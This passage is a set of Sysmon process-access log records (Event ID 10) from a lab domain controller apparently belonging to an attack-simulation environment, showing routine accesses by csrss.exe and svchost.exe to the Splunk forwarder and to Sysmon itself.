{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-00100D830E00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-00100D830E00}","TargetProcessId":"4652","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 